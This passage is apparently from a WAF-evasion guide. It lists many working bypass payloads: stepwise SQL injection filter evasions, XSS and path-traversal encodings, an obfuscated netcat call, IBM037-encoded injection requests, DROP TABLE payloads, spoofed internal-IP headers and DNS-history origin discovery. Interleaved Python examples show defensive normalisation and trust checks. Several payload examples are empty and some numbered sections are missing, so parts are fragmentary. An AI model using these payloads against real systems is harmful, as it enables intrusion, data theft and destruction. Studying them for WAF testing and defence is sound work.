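    ["and", "or", "union"],
    ["and", "or", "union", "where"],
    ["and", "or", "union", "where", "limit"],
    ["and", "or", "union", "where", "limit", "group by"],
]

# (blocked attempt, bypassed injection) for the matching step, as on the page.
CASE = [
    ("union select user, password from users",
     "1 ||(select user from users where user_id = 1) = 'admin'"),
    ("1 || (select user from users where user_id = 1) = 'admin'",
     "1 || (select user from users limit 1) = 'admin'"),
    ("1 || (select user from users limit 1) = 'admin'",
     "1 || (select user from users group by user_id having user_id = 1) = 'admin'"),
    ("1 || (select user from users group by user_id having user_id = 1) = 'admin'",
     "1 || (select substr(group_concat(user_id),1,1) user from users ) = 1"),
]


def blacklist_regex(keywords):
    """Build the preg_match-style alternation, e.g. /(and|or|union)/i."""
    alternation = "|".join(re.escape(k) for k in keywords)
    return re.compile("(" + alternation + ")", re.IGNORECASE)


def is_blocked(keywords, value):
    """True when this blacklist would raise an alarm for the parameter value."""
    return blacklist_regex(keywords).search(value) is not None


def walk_case():
    """Per step: (blocked attempt caught?, bypassed injection passes?)."""
    return [
        (is_blocked(keywords, blocked), not is_blocked(keywords, bypass))
        for keywords, (blocked, bypass) in zip(FILTER_STEPS, CASE)
    ]


def false_positives(keywords, legitimate_values):
    """Harmless inputs the same blacklist rejects: the cost of substring matching."""
    return [v for v in legitimate_values if is_blocked(keywords, v)]


def is_valid_id(value):
    """Allow-list: an id is a short decimal integer and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def lookup_user_sql(value):
    """Hardened handler: validate the type, then bind the value as a parameter.

    Returns (sql, params) in DB-API style; the value never touches the SQL text.
    """
    if not is_valid_id(value):
        raise ValueError("id must be a decimal integer")
    return "SELECT user FROM users WHERE user_id = ?", (int(value),)


if __name__ == "__main__":
    for step, (caught, slipped) in enumerate(walk_case(), start=1):
        print(f"step {step}: attempt caught={caught}, next bypass passes={slipped}")
    print("false positives:", false_positives(FILTER_STEPS[0], ["Oregon", "Andrea", "42"]))
    print(lookup_user_sql("42"))
```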
**Techniques:**

#### Blacklisting Detection/Bypass

* In this method we try to fingerprint the rules step by step by observing the keywords being blacklisted.
* The idea is to guess the regex and craft the next payloads so that they don't use the blacklisted keywords.

**Case**: SQL Injection

**• Step 1:**

**Keywords Filtered**: `and`, `or`, `union`
**Probable Regex**: `preg_match('/(and|or|union)/i', $id)`

* **Blocked Attempt**: `union select user, password from users`
* **Bypassed Injection**: `1 || (select user from users where user_id = 1) = 'admin'`

**• Step 2:**

**Keywords Filtered**: `and`, `or`, `union`, `where`

* **Blocked Attempt**: `1 || (select user from users where user_id = 1) = 'admin'`
* **Bypassed Injection**: `1 || (select user from users limit 1) = 'admin'`

**• Step 3:**

**Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`

* **Blocked Attempt**: `1 || (select user from users limit 1) = 'admin'`
* **Bypassed Injection**: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`

**• Step 4:**

**Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`

* **Blocked Attempt**: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
* **Bypassed Injection**: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`

**• Step 5:**

**Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`

* **Blocked Attempt**: `1 || (select substr(group_concat(user_id),1,1) user from users) = 1`
* **Bypassed Injection**: `1 || 1 = 1 into outfile 'result.txt'`
* **Bypassed Injection**: `1 || substr(user,1,1) = 'a'`

**• Step 6:**

**Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`,
`select`, `'`

* **Blocked Attempt**: `1 || (select substr(group_concat(user_id),1,1) user from users) = 1`
* **Bypassed Injection**: `1 || user_id is not null`
* **Bypassed Injection**: `1 || substr(user,1,1) = 0x61`
* **Bypassed Injection**: `1 || substr(user,1,1) = unhex(61)`

**• Step 7:**

**Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`

* **Blocked Attempt**: `1 || substr(user,1,1) = unhex(61)`
* **Bypassed Injection**: `1 || substr(user,1,1) = lower(conv(11,10,36))`

**• Step 8:**

**Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`

* **Blocked Attempt**: `1 || substr(user,1,1) = lower(conv(11,10,36))`
* **Bypassed Injection**: `1 || lpad(user,7,1)`

**• Step 9:**

**Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`

* **Blocked Attempt**: `1 || lpad(user,7,1)`
* **Bypassed Injection**: `1%0b||%0blpad(user,7,1)`

#### Obfuscation:

**Method:**

* Encoding the payload into different encodings \(a hit and trial approach\).
* You can encode the whole payload, or some parts of it, and test recursively.

**Techniques:**

**1. Case Toggling**

* Some poorly developed WAFs filter only a specific letter case.
* We can combine upper and lower case characters to develop efficient payloads.

**Standard**: ``
**Bypassed**: ``

**Standard**: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'`
**Bypassed**: `sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'`

**2. URL Encoding**

* Encode normal payloads with % encoding/URL encoding.
* Can be done with online tools like [this](https://www.url-encode-decode.com/).
* Burp includes an in-built encoder/decoder.

**Blocked**: ``
**Obfuscated**: ``

**Blocked**: `/?redir=http://google.com`
**Bypassed**: `/?redir=http://google。com` \(Unicode alternative\)

**Blocked**: `<marquee loop=1 onfinish=alert(1)>x`
**Bypassed**: `<marquee loop=1 onfinish=alert︵1)>x` \(Unicode alternative\)

> **TIP:** Have a look at [this](https://hackerone.com/reports/231444) and [this](https://hackerone.com/reports/231389) report on HackerOne. :\)

**Standard**: `../../etc/passwd`
**Obfuscated**: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd`

**4. HTML Representation**

* Often web apps encode special characters into HTML encoding and render them accordingly.
* This leads us to basic bypass cases with HTML encoding \(numeric/generic\).

**Standard**: `"><img src=x onerror=confirm()>`
**Encoded**: `&quot;&gt;&lt;img src=x onerror=confirm()&gt;` \(General form\)
**Encoded**: `&#34;&#62;&#60;img src=x onerror=confirm()&#62;` \(Numeric reference\)

**5. Mixed Encoding**

* Sometimes, WAF rules tend to filter out a specific type of encoding.
* This type of filter can be bypassed by mixed-encoding payloads.
* Tabs and newlines further add to obfuscation.

**Obfuscated**:

```text
XSS
```

**6. Using Comments**

* Comments obfuscate standard payload vectors.
* Different payloads have different ways of obfuscation.

**Blocked**: ``
**Bypassed**: ``

**Blocked**: `/?id=1+union+select+1,2,3--`
**Bypassed**: `/?id=1+un/**/ion+sel/**/ect+1,2,3--`

**7. Double Encoding**

* WAF filters often decode the input once before applying their rules.
* However, poorly developed filters \(no recursive decoding\) can be bypassed with double encoding.
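This item and the double URL encoding example in the general WAF notes come down to the same defender's mistake: decoding the input once and matching on the result. As an added example that is not part of the AwesomeWAF material, the Python below normalises a parameter value the way a WAF should before applying any rule: percent-decode until the value stops changing, then flag overlong UTF-8 such as the `%C0AE` traversal form above (written here as `%C0%AE`, one percent sign per byte); `normalize` and the helper names are mine.

```python
"""Normalise input before rule matching: double encoding and overlong UTF-8.

Added example. A WAF that percent-decodes exactly once sees "%73elect" where
the server, decoding again, sees "select"; one that decodes UTF-8 strictly
never sees the "../" that a lenient server builds from C0 AE C0 AF.
"""
from urllib.parse import unquote


def percent_decode_fixpoint(value, max_rounds=4):
    """Percent-decode until idempotent; return (text, rounds_used).

    Decoding as latin-1 keeps each byte as one character, so nothing is lost
    before the UTF-8 check below. More than one round means the sender
    double-encoded, which is worth logging on its own.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def lenient_utf8(raw):
    """Decode like a permissive server might; return (text, overlong_seen).

    Strict UTF-8 rejects lead bytes C0/C1, so the standard codec is tried
    first. Only on failure are 2-byte overlong forms accepted and mapped to
    the code point they smuggle (C0 AE -> '.', C0 AF -> '/'); other bytes are
    passed through as latin-1, which is good enough for rule matching.
    """
    try:
        return raw.decode("utf-8"), False
    except UnicodeDecodeError:
        pass
    out, overlong, i = [], False, 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong, i = True, i + 2
        else:
            out.append(chr(lead))
            i += 1
    return "".join(out), overlong


def normalize(value):
    """The view a WAF should match rules against, plus why the value is odd."""
    text, rounds = percent_decode_fixpoint(value)
    # Characters outside latin-1 arrived as Unicode, not percent-encoded; they
    # are outside this check and are replaced rather than raising.
    decoded, overlong = lenient_utf8(text.encode("latin-1", errors="replace"))
    return {
        "decoded": decoded,
        "rounds": rounds,
        "double_encoded": rounds > 1,
        "overlong_utf8": overlong,
    }


if __name__ == "__main__":
    for sample in (
        "1 union %25%37%33elect 1,2,3",                          # double URL encoding
        "/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe",
        "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFetc%C0%AFpasswd",    # overlong UTF-8
    ):
        print(normalize(sample))
```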
**Standard**: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
**Obfuscated**: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`

**Standard**: `<script>alert()</script>`
**Obfuscated**: `%253Cscript%253Ealert()%253C%252Fscript%253E`

**8. Wildcard Obfuscation**

* Globbing patterns are used by various command-line utilities to work with multiple files.
* We can tweak them to execute system commands.
* Specific to remote code execution vulnerabilities on Linux systems.

**Standard**: `/bin/cat /etc/passwd`
**Obfuscated**: `/???/??t /???/??ss??`
Used chars: `/ ? t s`

**Standard**: `/bin/nc 127.0.0.1 1337`
**Obfuscated**: `/???/n? 2130706433 1337`
Used chars: `/ ? n [0-9]`

**9. Dynamic Payload Generation**

* Different programming languages have different syntaxes and patterns for concatenation.
* This allows us to effectively generate payloads that can bypass many filters and rules.

**Standard**: ``
**Obfuscated**: ``

**Standard**: `/bin/cat /etc/passwd`
**Obfuscated**: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`

> Bash allows path concatenation for execution.

**Standard**: ``
**Obfuscated**:

```text
```

**13. Token Breakers**

* Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
* Token breakers are symbols that affect the correspondence between an element of a string and a certain token, and thus bypass search by signature.
* However, the request must still remain valid while using token breakers.
* **Case**: Unknown Token for the Tokenizer
  * **Payload**: `?id='-sqlite_version() UNION SELECT password FROM users --`
* **Case**: Unknown Context for the Parser \(Notice the uncontexted bracket\)
  * **Payload 1**: `?id=123);DROP TABLE users --`
  * **Payload 2**: `?id=1337) INTO OUTFILE 'xxx' --`

> **TIP:** More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).

**14. Obfuscation in Other Formats**

* Many web applications support different encoding types and can interpret the encoding \(see below\).
* Obfuscating our payload into a format not supported by the WAF, but supported by the server, can smuggle our payload in.

**Case:** IIS

* IIS6, 7.5, 8 and 10 \(ASPX v4.x\) allow **IBM037** character interpretations.
* We can encode our payload and send the encoded parameters with the query.

Original Request:

```text
POST /sample.aspx?id1=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

id2='union all select * from users--
```

Obfuscated Request + URL Encoding:

```text
POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
```

#### HTTP Parameter Pollution

**Method:**

* This attack method is based on how a server interprets parameters with the same names.
* Possible bypass chances here are:
  * The server uses the last received parameter, and the WAF checks only the first.
  * The server unites the values from similar parameters, and the WAF checks them separately.
**Technique:**

* The idea is to enumerate how the parameters are being interpreted by the server.
* In such a case we can pass the payload to a parameter which isn't being inspected by the WAF.
* Distributing a payload across parameters which can later get concatenated by the server is also useful.

Below is a comparison of different servers and their relative interpretations:

| **Environment** | **Parameter Interpretation** | **Example** |
| :--- | :--- | :--- |
| ASP/IIS | Concatenation by comma | par1=val1,val2 |
| JSP, Servlet/Apache Tomcat | First parameter is resulting | par1=val1 |
| ASP.NET/IIS | Concatenation by comma | par1=val1,val2 |
| PHP/Zeus | Last parameter is resulting | par1=val2 |
| PHP/Apache | Last parameter is resulting | par1=val2 |
| JSP, Servlet/Jetty | First parameter is resulting | par1=val1 |
| IBM Lotus Domino | First parameter is resulting | par1=val1 |
| IBM HTTP Server | Last parameter is resulting | par1=val2 |
| mod\_perl, libapeq2/Apache | First parameter is resulting | par1=val1 |
| Oracle Application Server 10G | First parameter is resulting | par1=val1 |
| Perl CGI/Apache | First parameter is resulting | par1=val1 |
| Python/Zope | First parameter is resulting | par1=val1 |
| IceWarp | An array is returned | \['val1','val2'\] |
| AXIS 2400 | Last parameter is resulting | par1=val2 |
| DBMan | Concatenation by two tildes | par1=val1~~val2 |
| mod-wsgi \(Python\)/Apache | An array is returned | ARRAY\(0x8b9058c\) |

#### HTTP Parameter Fragmentation

* HPF is based on the principle where the server unites the values being passed along the parameters.
* We can split the payload into different components and then pass the values via the parameters.
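The inspection-side lesson behind double URL encoding \(section 7\), the IBM037 charset trick \(section 14\) and the parameter pollution and fragmentation behaviour above is the same: a WAF that inspects the request as it arrives on the wire sees something different from what the backend parses. The following is an added defensive example, not code from this page or from any WAF product; it normalises a query the way a configured backend would \(percent-decoding to a fixed point, decoding the declared charset, collapsing duplicate names by policy, and reading all values in order\) before running a small constructed signature set. The policy names, the signatures and the sample inputs are constructed for the illustration.

```python
"""
Added defensive example (not from this page or any WAF product): decode a
query the way the backend will, then run signature checks on the result.
Policy names, signatures and sample inputs are constructed for illustration.
"""
import re
from urllib.parse import unquote_to_bytes

# Duplicate-name policies modelled on the interpretation table above:
# "first" (Tomcat, Jetty, ...), "last" (PHP/Apache, ...) and "concat"
# (ASP/IIS joins with ',', DBMan with '~~').  Constructed names, not a library API.
POLICIES = ("first", "last", "concat")

# Small constructed signature set; a real ruleset is far larger.
SIGNATURES = {
    "sqli-union": re.compile(r"union\s+(all\s+)?select", re.I),
    "traversal": re.compile(r"\.\.[/\\]"),
    "script-tag": re.compile(r"<script\b", re.I),
}


def percent_decode_fixpoint(raw: bytes, max_rounds: int = 4) -> bytes:
    """Percent-decode until the input stops changing, so %252E reaches '.'
    exactly as a backend that decodes twice will see it.  The round limit
    keeps hostile input from spinning the loop.  A WAF that decodes once
    misses everything the second round reveals."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(current)
        if decoded == current:
            break
        current = decoded
    return current


def split_pairs(query: bytes) -> list[tuple[bytes, bytes]]:
    """Split a form/query body into (name, value) byte pairs.  '+' becomes a
    space before percent-decoding so that an encoded '%2B' survives as '+'."""
    pairs = []
    for part in query.split(b"&"):
        if not part:
            continue
        name, _, value = part.partition(b"=")
        pairs.append((percent_decode_fixpoint(name.replace(b"+", b" ")),
                      percent_decode_fixpoint(value.replace(b"+", b" "))))
    return pairs


def resolve_duplicates(pairs, policy: str, sep: bytes = b",") -> dict[bytes, bytes]:
    """Collapse repeated parameter names the way the configured backend does."""
    if policy not in POLICIES:
        raise ValueError(f"unknown policy {policy!r}")
    resolved: dict[bytes, bytes] = {}
    for name, value in pairs:
        if name not in resolved or policy == "last":
            resolved[name] = value
        elif policy == "concat":
            resolved[name] = resolved[name] + sep + value
        # policy == "first": keep the value already stored
    return resolved


def inspect(query: bytes, charset: str = "utf-8", policy: str = "last") -> dict[str, list[str]]:
    """Return {parameter: [matched signatures]} after backend-style decoding.

    charset is the request's declared charset; Python knows IBM037 under the
    codec alias 'ibm037' (cp037), so an EBCDIC body is decoded to the text
    the ASP.NET backend actually parses.  The special key '<joined>' holds
    hits that appear only when every value is read in order, which is how a
    fragmented payload reassembles on a server that concatenates them.
    """
    pairs = split_pairs(query)
    hits: dict[str, list[str]] = {}
    for name, value in resolve_duplicates(pairs, policy).items():
        text = value.decode(charset, errors="replace")
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(text)]
        if matched:
            hits[name.decode(charset, errors="replace")] = matched
    joined = " ".join(v.decode(charset, errors="replace") for _, v in pairs)
    matched = [sig for sig, rx in SIGNATURES.items() if rx.search(joined)]
    if matched:
        hits["<joined>"] = matched
    return hits


if __name__ == "__main__":
    # Constructed samples mirroring the cases above.
    body_ibm037 = (b"%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3"
                   b"%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60")
    print(inspect(body_ibm037, charset="utf-8"))   # nothing: raw bytes look harmless
    print(inspect(body_ibm037, charset="ibm037"))  # id2 flagged as sqli-union
    print(inspect(b"id=1&id=%27+UNION+SELECT+1", policy="first"))
    print(inspect(b"id=1&id=%27+UNION+SELECT+1", policy="last"))
    print(inspect(b"a=1001+RLIKE&b=(-(-1))+UNION&c=SELECT+1&d=FROM+CREDIT_CARDS"))
```

The point of `policy` is that the inspection layer has to be told which row of the table above the backend corresponds to; a WAF that assumes "first" in front of a PHP/Apache backend checks a value the application never sees, and one that never looks at the `<joined>` view cannot see a payload spread across `a`..`d`.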
**Sample Payload**: `1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS`
**Sample Query URL**: `http://test.com/url?a=1001+RLIKE&b=(-(-1))+UNION&c=SELECT+1&d=FROM+CREDIT_CARDS`

> **TIP:** A real-life example of how bypasses can be crafted using this method can be found [here](http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2009-August/005673.html).

#### Browser Bugs:

**Charset Bugs:**

* We can try changing the charset header to a wider Unicode encoding \(e.g. UTF-32\) and test payloads.
* When the site decodes the string, the payload gets triggered.

Example request:

```text
GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept-Charset:utf-32; q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
```

When the site loads, it will be encoded to the UTF-32 encoding that we set, and then, as the output encoding of the page is UTF-8, it will be rendered as:

* **Case:** SQLi

```text
SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
1%0b||%0bLPAD(USER,7,1)
```

Many alternatives to the original JavaScript can be used, namely:

* [JSFuck](http://www.jsfuck.com/)
* [JJEncode](http://utf-8.jp/public/jjencode.html)
* [XChars.JS](https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html)

> However, the problem with using the above syntactic structures is the long payloads, which might be detected by the WAF or blocked by the CSP. Then again, you never know; they might bypass the CSP \(if present\) too. ;\)

#### Abusing SSL/TLS Ciphers:

* Many times, servers accept connections over a variety of SSL/TLS ciphers and versions.
* Initialising a connection to the server with a cipher that the WAF does not support does the job.

**Technique:**

* Dig out the ciphers supported by the firewall \(usually the WAF vendor documentation discusses this\).
* Find out the ciphers supported by the server \(tools like [SSLScan](https://github.com/rbsec/sslscan) help here\).
* If a cipher is found that the server supports but the WAF does not, voila!
* Initiating a new connection to the server with that specific cipher should smuggle our payload in.

> **Tool**: [abuse-ssl-bypass-waf](https://github.com/LandGrey/abuse-ssl-bypass-waf)

```text
python abuse-ssl-bypass-waf.py -thread 4 -target
```

CLI tools like cURL can come in very handy for PoCs:

```text
curl --ciphers -G -d
```

#### Abusing DNS History:

* Often old historical DNS records provide information about the location of the site behind the WAF.
* The target is to get the location of the site, so that we can route our requests directly to the site and not through the WAF.

> **TIP:** Some online services like [IP History](http://www.iphistory.ch/en/) and [DNS Trails](https://securitytrails.com/dns-trails) come to the rescue during the recon process.

**Tool**: [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)

```text
bash bypass-firewalls-by-DNS-history.sh -d --checkall
```

#### Using Whitelist Strings:

**Method:**

* Some WAF developers keep a shared secret with their users/devs which allows them to pass harmful queries through the WAF.
* This shared secret, if leaked or known, can be used to bypass all protections within the WAF.
**Technique:**

* Using the whitelist string as a parameter in GET/POST/PUT/DELETE requests smuggles our payload through the WAF.
* Usually some `*-sync-request` keyword or a shared token value is used as the secret.

Now when making a request to the server, you can append it as a parameter:

```text
http://host.com/?randomparameter=&=True
```

> A real-life example of how this works can be found at [this blog](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/).

#### Request Header Spoofing:

**Method:**

* The target is to fool the WAF/server into believing the request came from their internal network.
* Adding some spoofed headers that represent the internal network does the trick.

**Technique:**

* With each request a set of headers is added simultaneously, thus spoofing the origin.
* The upstream proxy/WAF misinterprets the request as coming from their internal network, and lets our gory payload through.

Some common headers used:

```text
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
```

#### Google Dorks Approach:

**Method:**

* There are a lot of known bypasses of various web application firewalls \([see section](https://github.com/0xInfection/Awesome-WAF#known-bypasses)\).
* With the help of Google dorks, we can easily find bypasses.

**Techniques:**

Before anything else, you should hone your skills with the [Google Dorks Cheat Sheet](http://pdf.textfiles.com/security/googlehackers.pdf).
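The DNS-history and request-header-spoofing techniques above both work against an origin that trusts the wrong thing: a DNS-history bypass succeeds when the origin accepts connections from anyone rather than only from the WAF, and header spoofing succeeds when the origin believes a client-supplied `X-Forwarded-For` or `X-Client-IP`. The following is an added defensive example, not code from this page or from any product, showing the origin-side trust model that closes both gaps: the TCP peer must be in the WAF's egress ranges, only the `X-Forwarded-For` entry appended by that trusted hop is believed, and the other address-claiming headers are recorded and ignored. The proxy ranges, header set and sample requests are constructed for the illustration, and it assumes exactly one trusted hop in front of the origin.

```python
"""
Added defensive example (not from this page or any product): origin-side
trust model against direct-to-origin connections and spoofed client headers.
Proxy ranges, header names and sample requests are constructed.
"""
import ipaddress

# Egress ranges of the WAF/CDN that is allowed to reach the origin
# (constructed documentation ranges).  An origin that enforces this list
# cannot be reached directly by someone who found its address in old DNS
# records: the request simply arrives from the wrong peer.
TRUSTED_PROXIES = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "2001:db8:ff::/48")]

# Client-supplied headers that claim an origin address.  Nothing in our hop
# chain sets them, so they are reported and otherwise ignored.
UNTRUSTED_IP_HEADERS = ("x-originating-ip", "x-remote-ip", "x-remote-addr", "x-client-ip")


def is_trusted_proxy(peer_ip: str) -> bool:
    """True if the TCP peer belongs to the WAF egress ranges."""
    addr = ipaddress.ip_address(peer_ip)
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(peer_ip: str, headers: dict[str, str]) -> str:
    """Derive the address to base decisions on (headers keyed in lower case).

    Assumption: exactly one trusted hop.  The WAF appends the real client to
    X-Forwarded-For, so only the rightmost entry is its word; anything to the
    left, including a '127.0.0.1' the client planted, is untrusted.  When the
    peer is not the WAF at all, the peer itself is the client.
    """
    if not is_trusted_proxy(peer_ip):
        return peer_ip
    entries = [e.strip() for e in headers.get("x-forwarded-for", "").split(",") if e.strip()]
    if not entries:
        return peer_ip
    try:
        return str(ipaddress.ip_address(entries[-1]))
    except ValueError:  # malformed value: do not guess, fall back to the peer
        return peer_ip


def evaluate(peer_ip: str, headers: dict[str, str]) -> dict:
    """Origin-side decision record for one request: whether to accept it at
    all (it must have come through the WAF), which client address to use,
    and which address-claiming headers were present and ignored."""
    lowered = {k.lower(): v for k, v in headers.items()}
    return {
        "accept": is_trusted_proxy(peer_ip),
        "client": client_ip(peer_ip, lowered),
        "ignored_headers": [h for h in UNTRUSTED_IP_HEADERS if h in lowered],
    }


if __name__ == "__main__":
    # Constructed samples: a direct-to-origin attempt with planted headers,
    # and the same headers arriving through the WAF, which appended the
    # real client address to X-Forwarded-For.
    print(evaluate("198.51.100.7",
                   {"X-Forwarded-For": "127.0.0.1", "X-Client-IP": "127.0.0.1"}))
    print(evaluate("203.0.113.10",
                   {"X-Forwarded-For": "127.0.0.1, 198.51.100.7",
                    "X-Originating-IP": "127.0.0.1"}))
```

In production the same allowlist is usually enforced one layer down as well \(firewall rules or the web server's own `allow`/`deny` directives\), so that a request that never touched the WAF is dropped before any application code runs; the Python check above is the part that decides which address the application may act on.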
* Normal search: `+ waf bypass`
* Searching for specific version exploits: `" " (bypass|exploit)`
* For specific type bypass exploits: `"" + (bypass|exploit)`
* On [Exploit DB](https://exploit-db.com/): `site:exploit-db.com + bypass`
* On [0Day Inject0r DB](https://0day.today/): `site:0day.today + (bypass|exploit)`
* On [Twitter](https://twitter.com/): `site:twitter.com + bypass`
* On [Pastebin](https://pastebin.com/): `site:pastebin.com + bypass`

--------------------------------------------------------------------------------